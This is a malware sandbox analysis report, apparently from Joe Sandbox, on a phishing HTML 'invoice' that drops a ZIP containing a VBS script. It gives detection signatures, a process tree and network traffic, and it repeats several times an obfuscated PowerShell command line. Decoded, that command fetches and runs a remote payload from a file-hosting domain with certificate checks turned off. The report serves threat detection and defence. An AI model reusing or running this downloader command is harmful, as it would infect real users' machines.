Edit tour

Windows Analysis Report
faktura_FV2025020637756.html

Overview

General Information

Sample name:faktura_FV2025020637756.html
Analysis ID:1636957
MD5:fdbd089f6a216713e974db50d00971a7
SHA1:3e22441e7e82cf8bfb0a8d407a6908785af289f5
SHA256:61fc74fbeb8df66b0d4aeb31bff1203d4fcd6375f272b2d019df1d9fcffdf3e4
Infos:

Detection

Score:96
Range:0 - 100
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
AI detected suspicious Javascript
Detected javascript redirector / loader
Downloads suspicious files via Chrome
Found suspicious ZIP file
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 5908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2148,i,14000748609247893809,15602923536421620925,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2184 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • unarchiver.exe (PID: 6704 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\faktura_FV2025020637756.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
      • 7za.exe (PID: 6728 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab" "C:\Users\user\Downloads\faktura_FV2025020637756.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6796 cmdline: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 6864 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 6268 cmdline: "C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 3068 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^|%{[char]($_/3)})-join'') ^| ^&($kwXZtAwej) " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • powershell.exe (PID: 3984 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • chrome.exe (PID: 6392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\faktura_FV2025020637756.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 149.56.240.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6864, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49709
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6796, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" , ProcessId: 6864, ProcessName: wscript.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6796, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" , ProcessId: 6864, ProcessName: wscript.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6796, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" , ProcessId: 6864, ProcessName: wscript.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", CommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Ap
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 149.56.240.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6864, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49709
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6796, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" , ProcessId: 6864, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine|base64offset|contains: hv, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6268, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, ProcessId: 3984, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.1.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behaviors, including dynamic code execution using `eval()` and obfuscated code. The deobfuscated code appears to be performing data exfiltration by sending user data to an untrusted domain. This combination of behaviors is highly suspicious and indicative of malicious intent, warranting a high-risk score.
Source: faktura_FV2025020637756.htmlHTTP Parser: Low number of body elements: 0
Source: faktura_FV2025020637756.htmlHTTP Parser: No favicon
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
Source: unknownHTTPS traffic detected: 149.56.240.131:443 -> 192.168.2.8:49709 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Google\Chrome\Application\chrome.exeChild: C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: chrome.exeMemory has grown: Private usage: 6MB later: 59MB

Networking

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 149.56.240.131 443Jump to behavior
Source: global trafficTCP traffic: 192.168.2.8:49695 -> 156.229.228.198:13621
Source: global trafficTCP traffic: 192.168.2.8:62227 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 149.56.240.131 149.56.240.131
Source: Joe Sandbox ViewIP Address: 149.56.240.129 149.56.240.129
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknownTCP traffic detected without corresponding DNS query: 23.60.201.147
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.63
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.99
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.99
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.99
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.99
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.99
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.99
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.99
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.99
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /stats/0.php?4935987&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEzNC4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1Host: s4.histats.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stats/0.php?4935988&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s4.histats.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: s4.histats.com
Source: global trafficDNS traffic detected: DNS query: filehost200885.info
Source: global trafficDNS traffic detected: DNS query: _13621._https.filehost200885.info
Source: wscript.exe, 0000000B.00000003.1221154917.00000000028E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_opened
Source: wscript.exe, 0000000B.00000002.2904446853.00000000049F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_opened3
Source: wscript.exe, 0000000B.00000002.2904973246.0000000004C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_openedN
Source: wscript.exe, 0000000B.00000002.2904973246.0000000004C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_openedS
Source: wscript.exe, 0000000B.00000002.2905465351.0000000005686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: wscript.exe, 0000000B.00000002.2903297378.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.C24
Source: wscript.exe, 0000000B.00000002.2903297378.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.
Source: wscript.exe, 0000000B.00000002.2903297378.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/
Source: wscript.exe, 0000000B.00000002.2903297378.000000000288D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/6
Source: wscript.exe, 0000000B.00000002.2903297378.0000000002818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/sta
Source: wscript.exe, 0000000B.00000002.2904973246.0000000004C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/stats/0.php?4935988&
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62229 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62229
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownHTTPS traffic detected: 149.56.240.131:443 -> 192.168.2.8:49709 version: TLS 1.2

System Summary

barindex
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile dump: C:\Users\user\Downloads\faktura_FV2025020637756.zip (copy)Jump to dropped file
Source: faktura_FV2025020637756.zip.crdownload.0.drZip Entry: 2025020641549.vbs
Source: chromecache_65.1.drZip Entry: 2025020641549.vbs
Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
